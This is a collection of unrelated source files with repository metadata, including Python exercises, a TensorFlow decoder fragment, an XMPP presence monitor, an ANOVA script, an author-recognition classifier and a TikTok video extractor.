  # with fixed length 100 we see ~1.5 batch/s, while dynamic length reaches ~3.55.
  # TODO: mask the attention over the padding.
input_maxlen = 0 if dynamic_batch_length else INPUT_TEXT_MAX_WORDS
#input_maxlen = INPUT_TEXT_MAX_WORDS
input_text = melt.sparse_tensor_to_dense(input_text, input_maxlen)
text_str = features['rtext_str']
input_text_str = features['ltext_str']
try:
image_name = features['image_name']
except Exception:
image_name = text_str
return image_name, text, text_str, input_text, input_text_str
def decode_examples(serialized_examples, dynamic_batch_length):
return _decode(serialized_examples, tf.parse_example, dynamic_batch_length)
def decode_example(serialized_example, dynamic_batch_length):
return _decode(serialized_example, tf.parse_single_example, dynamic_batch_length)
#-----------utils
def get_decodes(shuffle_then_decode, dynamic_batch_length):
if shuffle_then_decode:
inputs = melt.shuffle_then_decode.inputs
decode = lambda x: decode_examples(x, dynamic_batch_length)
else:
inputs = melt.decode_then_shuffle.inputs
decode = lambda x: decode_example(x, dynamic_batch_length)
return inputs, decode
|
[
"29109317@qq.com"
] |
29109317@qq.com
|
b4d087ebdad7c52b1f7aff6793cbe40278d29514
|
627a6a84b92605f997f3c8d64a2c3c0eb6a74e52
|
/venv/bin/easy_install-3.6
|
ea37d7573e615c666ad275aa4efade0c853a1511
|
[] |
no_license
|
iamjasonkuo/househunt
|
c67c75d8cc6e3a9cdae8bc1ef55396766c34d91f
|
7e9a4b380381f46dfebf51ead955051b39a9a691
|
refs/heads/master
| 2022-10-16T04:02:41.007357
| 2018-04-19T17:22:25
| 2018-04-19T17:22:25
| 100,439,717
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
6
|
#!/Users/jasonkuo/Desktop/random_coding_stuff/househunt/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jasonkuo@Jasons-MacBook-Pro.local"
] |
jasonkuo@Jasons-MacBook-Pro.local
|
887e7916d09010528ac3bd14caf87cdbb2bd0b28
|
5704bf1f4e8d3bc0ded23406d5cd0dc93412ea27
|
/python/python_questions/merge_lists.py
|
fbbdddb779722b62e321b868d652a2881ed71cf1
|
[] |
no_license
|
apollopower/interview-prep
|
c6854b0e15a516fe46993f72ca8922f74881ec49
|
4d53b473efc001d41b989131762f0deaee5c7b13
|
refs/heads/master
| 2020-03-27T08:14:24.951750
| 2019-04-03T20:27:21
| 2019-04-03T20:27:21
| 146,235,471
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
# Merge Two Sorted lists
# The key to this problem is that the given lists are
# already sorted. We can just iterate through both
# at the same time, inserting the smallest value at a given
# time, and then checking the next value
# Space complexity => O(n), we are returning a newly merged list
# Time complexity => O(n), we are iterating through each list only once
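# (For reference, the standard library's heapq.merge(list_1, list_2) yields the
# same merged order lazily; the point here is to write the merge by hand.)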
def merged_lists(list_1, list_2):
merged_list = []
if len(list_1) > len(list_2):
largest_length = len(list_1)
else:
largest_length = len(list_2)
i = 0 # list_1
j = 0 # list_2
while i < largest_length or j < largest_length:
if i == len(list_1):
            # insert remaining values of list_2
# and return merged_list
while j < largest_length:
merged_list.append(list_2[j])
j += 1
return merged_list
elif j == len(list_2):
# insert remaining values of list_1
# and return merged_list
while i < largest_length:
merged_list.append(list_1[i])
i += 1
return merged_list
elif list_1[i] < list_2[j]:
merged_list.append(list_1[i])
i += 1
else:
merged_list.append(list_2[j])
j += 1
return merged_list
list_1 = [1,3,5,7,10,12]
list_2 = [2,4,6,8,9]
print(merged_lists(list_1, list_2))
|
[
"erthaljonas@gmail.com"
] |
erthaljonas@gmail.com
|
7db69faceef3b27295847c559aff8e592796a2c9
|
e51de69384d96440f8a070ebdcaf543b91ffe59b
|
/TutorialPoint/01 - Variable Types/9 - DataTypeConversion.py
|
e01050de60aa53fdb923fb3cd0d85adcd0a87449
|
[] |
no_license
|
PriscylaSantos/estudosPython
|
08c8ff245926f88d08a5ba0021ae810d1c548644
|
582e562f34e01db9d8ab6ad9c1c18c7339d3147c
|
refs/heads/master
| 2018-09-09T06:57:52.204792
| 2018-06-05T03:16:38
| 2018-06-05T03:16:38
| 77,758,338
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 500
|
py
|
#!/usr/bin/python3
a = 251.96
print(a)
a= int(a)
print(a)
print('************')
b = 598
print(b)
print(float(b))
print('************')
c=789
print(c)
print(complex(c))
print('************')
d = 45.98
print(d)
print(str(d))
print('************')
e = 947.65
print(e)
print(repr(e))
print('************')
f = 67565
print(f)
print(eval('f'))
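# eval('e + f') evaluates the string as Python with the current bindings:
# 947.65 + 67565 = 68512.65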
print(eval('e + f'))
print('************')
g = (123, 'xyz', 'banana', 'abc')
print(g)
print(tuple(g))
print(list(g))
print(set(g))
print('************')
|
[
"santospriscyla@gmail.com"
] |
santospriscyla@gmail.com
|
fa3f577d5ee48bba9e9a4d305970d0915491d935
|
322ed5d0858a88945f68c073198b74cfc6641b94
|
/pattern_2.py
|
8fb72d09f463135e9499ee377a4c16986b0c8b4e
|
[] |
no_license
|
jeyaprakash1/pattern_programs
|
9282a3672f224af19a1b89fad4f47678d29de0cf
|
12765b99204b1c8713df3d2c24ac64bfb4f878b9
|
refs/heads/master
| 2023-04-01T21:52:30.931953
| 2021-04-09T12:54:23
| 2021-04-09T12:54:23
| 356,271,103
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
# 5
# 5 4
# 5 4 3
# 5 4 3 2
# 5 4 3 2 1
for row in range(4, -1, -1):
    for col in range(5, row, -1):
        print(col, end=" ")
    print()
|
[
"jpofficial1232@gmail.com"
] |
jpofficial1232@gmail.com
|
f3ec4b5d56c492f717d06d10ff2d025e4711e006
|
ef0aeed18a88ee8a2b8049676de91e51ea176138
|
/prac_08/silver_service_taxi.py
|
4bf1fcadbf4c13814e40a8d6950c38c09962be91
|
[] |
no_license
|
anniebbcute/CP1404_Practicals
|
6073dfdc5e065f48254839db7b4d94711639ac5f
|
ee0cdc62f2ce514b37d2d806300b2642994e053a
|
refs/heads/master
| 2020-04-15T08:59:50.181191
| 2019-01-08T02:01:25
| 2019-01-08T02:01:25
| 164,534,130
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 478
|
py
|
from prac_08.taxi import Taxi
class SilverServiceTaxi(Taxi):
flagfall = 4.50
def __init__(self, name, fuel, fanciness):
super().__init__(name, fuel)
self.fanciness = fanciness
self.price_per_km *= fanciness
def __str__(self):
return "{} plus flagfall of ${:.2f}".format(super().__str__(),
self.flagfall)
def get_fare(self):
return self.flagfall + super().get_fare()
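# Hypothetical usage (assumes the Taxi base class from prac_08 provides
# drive() and price_per_km, as in the CP1404 practicals):
# fancy = SilverServiceTaxi("Hummer", 200, 2)
# fancy.drive(18)
# print(fancy, "-> fare: ${:.2f}".format(fancy.get_fare()))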
|
[
"mengyuan.li@my.jcu.edu.au"
] |
mengyuan.li@my.jcu.edu.au
|
54af91f3b084bfc89ea4529342b2658ee3a18296
|
3509ae9b97f80256489d18e484dfad5cec45433a
|
/zhuanqspidersys/spiderapp/admin.py
|
5090782cc7ef0c718742f2f490b302da7b190951
|
[] |
no_license
|
xichagui/spider
|
64722c0dedaf7405cc10e686ee26aa94002a598b
|
fd5f70e7590c05bae49d914b8c7add6f371b2903
|
refs/heads/master
| 2021-01-20T09:20:58.697145
| 2017-07-12T19:05:47
| 2017-07-12T19:05:47
| 90,242,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 193
|
py
|
from django.contrib import admin
# Register your models here.
from spiderapp.models import Work, Author, Style
admin.site.register(Work)
admin.site.register(Author)
admin.site.register(Style)
|
[
"xichagui@gmail.com"
] |
xichagui@gmail.com
|
2ffe545e06630f9a96ba023367bc13c66eb5fdc3
|
382df78024f588acea08039a0b0a9e24f297b6a3
|
/python/numpy/anova.py
|
f5f74623337bf259841cfdfc490d5f14c989db8f
|
[] |
no_license
|
id774/sandbox
|
c365e013654790bfa3cda137b0a64d009866d19b
|
aef67399893988628e0a18d53e71e2038992b158
|
refs/heads/master
| 2023-08-03T05:04:20.111543
| 2023-07-31T14:01:55
| 2023-07-31T14:01:55
| 863,038
| 4
| 1
| null | 2020-03-05T06:18:03
| 2010-08-26T01:05:11
|
TeX
|
UTF-8
|
Python
| false
| false
| 1,128
|
py
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
data = np.array([[5., 7., 12.],
[6., 5., 10.],
[3., 4., 8.],
[2., 4., 6.]])
s_mean = np.zeros(data.shape)
for i in range(data.shape[1]):
s_mean[:, i] = data[:, i].mean()
print("ๆฐดๆบๅนณๅ " + str(s_mean))
kouka = s_mean - np.ones(data.shape) * data.mean()
print("ๆฐดๆบ้ๅๅทฎ๏ผๅ ๅญใฎๅนๆ๏ผ := ๆฐดๆบๅนณๅ - ๅ
จไฝๅนณๅ " + str(kouka))
Q1 = (kouka * kouka).sum()
print("ๆฐดๆบ้ๅคๅ๏ผๅนๆใฎๅๅทฎๅนณๆนๅ๏ผSS๏ผ๏ผ " + str(Q1))
f1 = data.shape[1] - 1
print("่ช็ฑๅบฆ " + str(f1))
V1 = Q1 / f1
print("ๆฐดๆบ้ๅๅทฎ๏ผๅนๆ๏ผใฎๅนณๅๅนณๆน๏ผMS๏ผ๏ผไธๅคๅๆฃ๏ผ " + str(V1))
error = data - s_mean
print("ๆฐดๆบๅ
ๅๅทฎ๏ผ็ตฑ่จ่ชคๅทฎ๏ผ " + str(error))
Q2 = (error * error).sum()
print("่ชคๅทฎใฎๅๅทฎๅนณๆนๅ๏ผSS๏ผ " + str(Q2))
f2 = (data.shape[0] - 1) * data.shape[1]
print("่ช็ฑๅบฆ๏ผDF๏ผ " + str(f2))
V2 = Q2 / f2
print("ๆฐดๆบๅ
ๅๅทฎ๏ผ่ชคๅทฎ๏ผใฎๅนณๅๅนณๆน๏ผMS๏ผ๏ผไธๅคๅๆฃ๏ผ " + str(V2))
F = V1 / V2
print("ๅๆฃๆฏ๏ผFๅค๏ผ " + str(F))
|
[
"idnanashi@gmail.com"
] |
idnanashi@gmail.com
|
a861df308430c874bb9b35a992ad194fdb7d74b1
|
90f41cf195a1929978cddf06c2f7145efe9477b5
|
/mimir/monitor/presence.py
|
655230a088e2310e58cbf49f7bca9b61fc9eb766
|
[
"MIT"
] |
permissive
|
Cloudxtreme/mimir
|
efd7d774a6592359d174a7ebee3aabdfeb1078a2
|
1e507d9e973bde9ed2d75355c42de5cbfecf691d
|
refs/heads/master
| 2021-05-27T16:13:20.546036
| 2012-05-10T14:09:14
| 2012-05-10T14:09:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,266
|
py
|
# Copyright (c) 2005-2007 Ralph Meijer
# See LICENSE for details
from wokkel.xmppim import PresenceClientProtocol
class Storage(object):
def __init__(self, dbpool):
self._dbpool = dbpool
d = self._dbpool.runOperation("""UPDATE presences
SET type='unavailable', show='',
status='', priority=0
WHERE type='available'""")
def eb(failure):
print failure
d.addErrback(eb)
def set_presence(self, entity, available, show, status, priority):
return self._dbpool.runInteraction(self._set_presence, entity,
available,
show,
status,
priority)
def _set_presence(self, cursor, entity, available, show, status, priority):
if available:
type = 'available'
else:
type = 'unavailable'
show = show or ''
status = status or ''
# changed is True when this resource became the top resource, or when
# it continued to be the top resource and the availability or show
# changed, or when another resource became the top resource
changed = False
# Find existing entry for this resource
cursor.execute("""SELECT presence_id, type, show FROM presences
WHERE jid=%s AND resource=%s""",
(entity.userhost(), entity.resource))
result = cursor.fetchone()
print "result: %r" % result
if result:
id, old_type, old_show = result
if old_type == 'unavailable':
# delete old record, the new record will be inserted below
cursor.execute("DELETE FROM presences WHERE presence_id=%s",
id)
if result and old_type == 'available':
if show != old_show:
print " show != old_show"
changed = True
cursor.execute("""UPDATE presences SET
type=%s, show=%s, status=%s, priority=%s,
last_updated=now()
WHERE presence_id=%s""",
(type, show, status, priority, id))
else:
print " new presence record"
changed = True
cursor.execute("""INSERT INTO presences
(type, show, status, priority, jid, resource)
VALUES (%s, %s, %s, %s, %s, %s)""",
(type, show, status, priority,
entity.userhost(), entity.resource))
return changed
def update_roster(self, changed, entity):
return self._dbpool.runInteraction(self._update_roster, changed,
entity)
def _update_roster(self, cursor, changed, entity):
print "Updating roster for %r" % entity.full()
# Find new top resource's presence id
cursor.execute("""SELECT presence_id, resource FROM presences
WHERE jid=%s ORDER by type, priority desc,
(CASE WHEN type='available'
THEN presence_id
ELSE 0
END), last_updated desc""",
entity.userhost())
result = cursor.fetchone()
top_id, top_resource = result
# Get old top resource's presence id.
cursor.execute("SELECT presence_id FROM roster WHERE jid=%s",
entity.userhost())
result = cursor.fetchone()
print "result 2: %r" % result
if result:
old_top_id = result[0]
print " old_top_id %d" % old_top_id
if old_top_id != top_id:
print " old_top_id != top_id"
changed = True
elif entity.resource != top_resource:
print " we are not the top resource"
changed = False
# else, we are still the top resource. Keep the changed value
# that got passed.
cursor.execute("UPDATE roster SET presence_id=%s WHERE jid=%s",
(top_id, entity.userhost()))
else:
changed = True
cursor.execute("""INSERT INTO roster
(presence_id, jid) VALUES
(%s, %s)""",
(top_id, entity.userhost()))
return changed
def remove_presences(self, entity):
return self._dbpool.runInteraction(self._remove_presences, entity)
def _remove_presences(self, cursor, entity):
cursor.execute("DELETE FROM roster WHERE jid=%s", entity.userhost())
cursor.execute("DELETE FROM presences WHERE jid=%s", entity.userhost())
class Monitor(PresenceClientProtocol):
def __init__(self, storage):
self.storage = storage
self.callbacks = []
def connectionInitialized(self):
PresenceClientProtocol.connectionInitialized(self)
self.available()
def register_callback(self, f):
self.callbacks.append(f)
def store_presence(self, entity, available, show, status, priority):
d = self.storage.set_presence(entity, available, show, status, priority)
d.addCallback(self.storage.update_roster, entity)
def cb(changed, entity):
print "Changed %r: %s" % (entity.full(), changed)
if changed:
for f in self.callbacks:
f(entity, available, show)
d.addCallback(cb, entity)
d.addErrback(self.error)
def availableReceived(self, entity, show, statuses, priority):
print "available: %r" % entity.full()
if statuses:
status = statuses.popitem()[1]
else:
status = None
print " status: %r" % status
self.store_presence(entity, True, show, status, priority)
def unavailableReceived(self, entity, statuses):
if statuses:
status = statuses.popitem()[1]
else:
status = None
print " status: %r" % status
self.store_presence(entity, False, None, status, 0)
def error(self, failure):
print failure
class RosterMonitor(Monitor):
def connectionInitialized(self):
self.send("<iq type='get'><query xmlns='jabber:iq:roster'/></iq>")
Monitor.connectionInitialized(self)
def subscribeReceived(self, entity):
self.subscribed(entity)
# return the favour
self.subscribe(entity)
#def subscribedReceived(self, entity):
# pass
def unsubscribeReceived(self, entity):
self.unsubscribed(entity)
# return the favour
self.unsubscribe(entity)
def unsubscribedReceived(self, entity):
d = self.storage.remove_presences(entity)
d.addErrback(self.error)
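
# Hedged wiring sketch (added; not part of the original module). The DSN and
# JID below are hypothetical placeholders showing how Storage and RosterMonitor
# might be glued to Twisted's adbapi pool and a wokkel XMPP client:
#
#     from twisted.enterprise import adbapi
#     from twisted.words.protocols.jabber.jid import JID
#     from wokkel.client import XMPPClient
#
#     dbpool = adbapi.ConnectionPool('psycopg2', database='mimir')
#     storage = Storage(dbpool)
#     client = XMPPClient(JID('monitor@example.org'), 'secret')
#     monitor = RosterMonitor(storage)
#     monitor.setHandlerParent(client)
#     client.startService()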
|
[
"ralphm@ik.nu"
] |
ralphm@ik.nu
|
745537de9256b97545fc0f5e94500f3962355db8
|
853b17641b1a7f61fe979882ea9a12b7a669bc8a
|
/AuthorRecognizer/author_recognizer.py
|
e54c00b027120b1111ef031f6607c803f7de07de
|
[] |
no_license
|
kerata/Cmpe561-NLP
|
dca6c35f6b9d6d0d89a762774e7a28318d801d16
|
04bf37b5a94be5ead7ecdcc26951e13964452d57
|
refs/heads/master
| 2021-01-01T03:55:41.440992
| 2016-05-10T14:14:51
| 2016-05-10T14:14:51
| 58,454,160
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,762
|
py
|
#!/usr/local/Cellar/python3/3.5.1/bin/python3.5
import os
import argparse
import utils
from random import shuffle
from math import log
from models import Author
VERBOSE = True
DEBUG = False
LESS = True
vocabulary = {}
training_set = {}
test_set = {}
def train(article_count):
global vocabulary
for author in training_set.values():
author.possibility = log(author.article_count / article_count)
if DEBUG:
print("Vocabulary created: " + str(vocabulary))
utils.print_bold("Training finished")
def map_all_articles_to_authors(path, encoding, ratio):
if VERBOSE:
utils.print_header("Traversing files")
folders = os.listdir(path)
article_count = 0
for author_name in folders:
if VERBOSE:
utils.print_header("Traversing texts of: " + author_name)
if os.path.isdir(os.path.join(path, author_name)):
article_file_names = []
for filename in os.listdir(os.path.join(path, author_name)):
article_file_names.insert(len(article_file_names), os.path.join(path, author_name, filename))
global vocabulary
shuffle(article_file_names)
slicing_point = int(len(article_file_names) * ratio)
article_count += slicing_point
training_set[author_name] = Author(author_name, article_file_names[:slicing_point], encoding, vocabulary)
test_set[author_name] = Author(author_name, article_file_names[slicing_point:], encoding, None)
if VERBOSE:
utils.print_bold(author_name + " learned!")
train(article_count)
find_authors_for_articles()
def probabilities_for_function(func, test_author, reverse=True):
return utils.normalize_probabilities(
[[[trained_author.author_name, func(trained_author, vocabulary=vocabulary, article=article)]
for trained_author in training_set.values()] for article in test_author.articles], reverse=reverse)
def find_authors_for_articles():
if VERBOSE or DEBUG:
utils.print_header("Testing started")
t0 = 0
t1 = 0
t2 = 0
t3 = 0
t4 = 0
t5 = 0
t6 = 0
t7 = 0
t8 = 0
t9 = 0
t10 = 0
total_correct = 0
total_fail = 0
macro_avg = 0
for author_name, test_author in test_set.items():
if VERBOSE:
utils.print_header("Testing for: " + author_name)
naive_probabilities = probabilities_for_function(
Author.calculate_naive_bayes_probability, test_author)
total_probabilities = naive_probabilities
wc_in_sentence_probabilities = probabilities_for_function(
Author.get_diff_word_count_in_sentence, test_author, reverse=False)
wc_in_article_probabilities = probabilities_for_function(
Author.get_diff_word_count_in_article, test_author, reverse=False)
comma_probabilities = probabilities_for_function(
Author.get_diff_comma_count, test_author, reverse=False)
word_length_probabilities = probabilities_for_function(
Author.get_diff_word_length, test_author, reverse=False)
abbreviation_probabilities = probabilities_for_function(
Author.get_diff_abbreviation_count, test_author, reverse=False)
quasi_probabilities = probabilities_for_function(
Author.get_diff_quasi_count, test_author, reverse=False)
quote_probabilities = probabilities_for_function(
Author.get_diff_quote_count, test_author, reverse=False)
exclamation_probabilities = probabilities_for_function(
Author.get_diff_exclamation_count, test_author, reverse=False)
question_probabilities = probabilities_for_function(
Author.get_diff_question_mark_count, test_author, reverse=False)
colon_probabilities = probabilities_for_function(
Author.get_diff_colon_count, test_author, reverse=False)
semicolon_probabilities = probabilities_for_function(
Author.get_diff_semicolon_count, test_author, reverse=False)
for i in range(len(naive_probabilities)):
for j in range(len(naive_probabilities[i])):
total_probabilities[i][j][1] = naive_probabilities[i][j][1] * 40
val = [x[1] for k, x in enumerate(wc_in_sentence_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(wc_in_article_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(comma_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(word_length_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(abbreviation_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(quasi_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(quote_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(exclamation_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(question_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(colon_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(semicolon_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
total_probabilities = [sorted(author, key=lambda a: a[1], reverse=True) for author in total_probabilities]
correct = 0
fail = 0
for i in range(len(total_probabilities)):
guessed_author_names = [author[0] for author in total_probabilities[i]]
if author_name == guessed_author_names[0]:
correct += 1
if DEBUG or VERBOSE and not LESS:
utils.print_green(author_name + " : " + str(guessed_author_names[0]))
else:
fail += 1
if DEBUG or VERBOSE and not LESS:
utils.print_fail(author_name + " : " + guessed_author_names[0] +
" rank : " + str(guessed_author_names.index(author_name)))
if DEBUG:
utils.print_blue("wc_sentence : " + str([k for k, x in enumerate(wc_in_sentence_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("wc_in_article : " + str([k for k, x in enumerate(wc_in_article_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("word_length : " + str([k for k, x in enumerate(word_length_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("abbreviation : " + str([k for k, x in enumerate(abbreviation_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("quasi : " + str([k for k, x in enumerate(quasi_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("quote : " + str([k for k, x in enumerate(quote_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("exclamation : " + str([k for k, x in enumerate(exclamation_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("question : " + str([k for k, x in enumerate(question_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("comma : " + str([k for k, x in enumerate(comma_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("colon : " + str([k for k, x in enumerate(colon_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("semicolon : " + str([k for k, x in enumerate(semicolon_probabilities[i])
if x[0] == author_name][0]))
t0 += [k for k, x in enumerate(wc_in_sentence_probabilities[i]) if x[0] == author_name][0]
t1 += [k for k, x in enumerate(wc_in_article_probabilities[i]) if x[0] == author_name][0]
t2 += [k for k, x in enumerate(word_length_probabilities[i]) if x[0] == author_name][0]
t3 += [k for k, x in enumerate(abbreviation_probabilities[i]) if x[0] == author_name][0]
t4 += [k for k, x in enumerate(quasi_probabilities[i]) if x[0] == author_name][0]
t5 += [k for k, x in enumerate(quote_probabilities[i]) if x[0] == author_name][0]
t6 += [k for k, x in enumerate(exclamation_probabilities[i]) if x[0] == author_name][0]
t7 += [k for k, x in enumerate(question_probabilities[i]) if x[0] == author_name][0]
t8 += [k for k, x in enumerate(comma_probabilities[i]) if x[0] == author_name][0]
t9 += [k for k, x in enumerate(colon_probabilities[i]) if x[0] == author_name][0]
t10 += [k for k, x in enumerate(semicolon_probabilities[i]) if x[0] == author_name][0]
macro_avg += correct / (correct + fail)
if DEBUG or VERBOSE and not LESS:
utils.print_blue(author_name +
" correct : " + str(correct) +
" fail : " + str(fail) +
" res : " + str(macro_avg))
total_correct += correct
total_fail += fail
if DEBUG:
utils.print_header("Extra feature average ranks: ")
utils.print_bold("word count in sentence:" + str(t0 / total_fail))
utils.print_bold("word count in article: " + str(t1 / total_fail))
utils.print_bold("word length: " + str(t2 / total_fail))
utils.print_bold("abbreviation count: " + str(t3 / total_fail))
utils.print_bold("quasi count: " + str(t4 / total_fail))
utils.print_bold("quote count: " + str(t5 / total_fail))
utils.print_bold("exclamation count: " + str(t6 / total_fail))
utils.print_bold("question mark count: " + str(t7 / total_fail))
utils.print_bold("comma count: " + str(t8 / total_fail))
utils.print_bold("colon count: " + str(t9 / total_fail))
utils.print_bold("semicolon count: " + str(t10 / total_fail))
utils.print_header("Correct : " + str(total_correct) +
" Fail : " + str(total_fail))
utils.print_header("Micro Averaged : " + str(total_correct / (total_correct + total_fail)))
utils.print_header("Macro Averaged : " + str(macro_avg / len(test_set)))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true')
parser.add_argument('-nv', '--no-verbose', dest='verbose', action='store_false')
parser.add_argument('-d', '--debug', dest='debug', action='store_true')
parser.add_argument('-nd', '--no-debug', dest='debug', action='store_false')
parser.add_argument('-nl', '--no-less', dest='less', action='store_false')
parser.add_argument('-l', '--less', dest='less', action='store_true')
parser.add_argument('-p', '--path', default="./raw_texts", type=str, help='Path to container folder')
parser.add_argument('-e', '--encoding', default="windows-1254", type=str, help='File encoding')
parser.add_argument('-a', '--alpha', default="0.011", type=float, help='Alpha value for naive bayes normalizer')
parser.add_argument('-r', '--ratio', default=0.6, type=float, help='Rate to split for test and training sets')
opts = parser.parse_args()
Author.alpha = opts.alpha
VERBOSE = opts.verbose
LESS = opts.less
DEBUG = opts.debug
if VERBOSE:
print("VERBOSE: true DEBUG: " + str(DEBUG) + " LESS: " + str(LESS) + " folder_path: " + opts.path +
" encoding: " + opts.encoding + " alpha for normalization: " + str(opts.alpha) +
" Training/Data: " + str(opts.ratio))
map_all_articles_to_authors(path=opts.path, encoding=opts.encoding, ratio=opts.ratio)
|
[
"merttiftikci@gmail.com"
] |
merttiftikci@gmail.com
|
a99bffaff666e643eaebaf370beba5018ff88415
|
10717fe6f68c4ee9bcf27ee62e89581f4a030b8e
|
/extractor/tiktok.py
|
63aca954198bb80252aac6500ccde099ebec1c18
|
[] |
no_license
|
HagerHosny199/Testing_Project
|
ff7f9a54b7a213c9d9ade0c5192845c2a29adc8b
|
9bc170263e239cc24ccfb2aa33b9913ff799ffe9
|
refs/heads/master
| 2020-05-17T20:57:01.750640
| 2019-05-08T22:13:06
| 2019-05-08T22:13:06
| 183,954,736
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,808
|
py
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (  # relative import assumed, mirroring the youtube-dl layout this file derives from
compat_str,
ExtractorError,
int_or_none,
str_or_none,
try_get,
url_or_none,
)
class TikTokBaseIE(InfoExtractor):
def _extract_aweme(self, data):
video = data['video']
description = str_or_none(try_get(data, lambda x: x['desc']))
width = int_or_none(try_get(data, lambda x: video['width']))
height = int_or_none(try_get(data, lambda x: video['height']))
format_urls = set()
formats = []
for format_id in (
'play_addr_lowbr', 'play_addr', 'play_addr_h264',
'download_addr'):
for format in try_get(
video, lambda x: x[format_id]['url_list'], list) or []:
format_url = url_or_none(format)
if not format_url:
continue
if format_url in format_urls:
continue
format_urls.add(format_url)
formats.append({
'url': format_url,
'ext': 'mp4',
'height': height,
'width': width,
})
self._sort_formats(formats)
thumbnail = url_or_none(try_get(
video, lambda x: x['cover']['url_list'][0], compat_str))
uploader = try_get(data, lambda x: x['author']['nickname'], compat_str)
timestamp = int_or_none(data.get('create_time'))
comment_count = int_or_none(data.get('comment_count')) or int_or_none(
try_get(data, lambda x: x['statistics']['comment_count']))
repost_count = int_or_none(try_get(
data, lambda x: x['statistics']['share_count']))
aweme_id = data['aweme_id']
return {
'id': aweme_id,
'title': uploader or aweme_id,
'description': description,
'thumbnail': thumbnail,
'uploader': uploader,
'timestamp': timestamp,
'comment_count': comment_count,
'repost_count': repost_count,
'formats': formats,
}
class TikTokIE(TikTokBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:
(?:m\.)?tiktok\.com/v|
(?:www\.)?tiktok\.com/share/video
)
/(?P<id>\d+)
'''
_TESTS = [{
'url': 'https://m.tiktok.com/v/6606727368545406213.html',
'md5': 'd584b572e92fcd48888051f238022420',
'info_dict': {
'id': '6606727368545406213',
'ext': 'mp4',
'title': 'Zureeal',
'description': '#bowsette#mario#cosplay#uk#lgbt#gaming#asian#bowsettecosplay',
'thumbnail': r're:^https?://.*~noop.image',
'uploader': 'Zureeal',
'timestamp': 1538248586,
'upload_date': '20180929',
'comment_count': int,
'repost_count': int,
}
}, {
'url': 'https://www.tiktok.com/share/video/6606727368545406213',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(
'https://m.tiktok.com/v/%s.html' % video_id, video_id)
data = self._parse_json(self._search_regex(
r'\bdata\s*=\s*({.+?})\s*;', webpage, 'data'), video_id)
return self._extract_aweme(data)
class TikTokUserIE(TikTokBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:
(?:m\.)?tiktok\.com/h5/share/usr|
(?:www\.)?tiktok\.com/share/user
)
/(?P<id>\d+)
'''
_TESTS = [{
'url': 'https://m.tiktok.com/h5/share/usr/188294915489964032.html',
'info_dict': {
'id': '188294915489964032',
},
'playlist_mincount': 24,
}, {
'url': 'https://www.tiktok.com/share/user/188294915489964032',
'only_matching': True,
}]
def _real_extract(self, url):
user_id = self._match_id(url)
data = self._download_json(
'https://m.tiktok.com/h5/share/usr/list/%s/' % user_id, user_id,
query={'_signature': '_'})
entries = []
for aweme in data['aweme_list']:
try:
entry = self._extract_aweme(aweme)
except ExtractorError:
continue
entry['extractor_key'] = TikTokIE.ie_key()
entries.append(entry)
return self.playlist_result(entries, user_id)
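
# Hedged smoke test (added for illustration; runs only when the relative
# imports above resolve): the _VALID_URL patterns can be checked offline.
if __name__ == '__main__':
    import re
    assert re.match(TikTokIE._VALID_URL,
                    'https://m.tiktok.com/v/6606727368545406213')
    assert re.match(TikTokUserIE._VALID_URL,
                    'https://www.tiktok.com/share/user/188294915489964032')
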